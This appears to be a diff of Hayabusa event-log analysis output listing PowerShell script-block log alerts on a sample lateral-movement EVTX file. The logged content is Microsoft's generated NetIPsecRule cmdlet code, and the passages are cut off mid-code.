$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 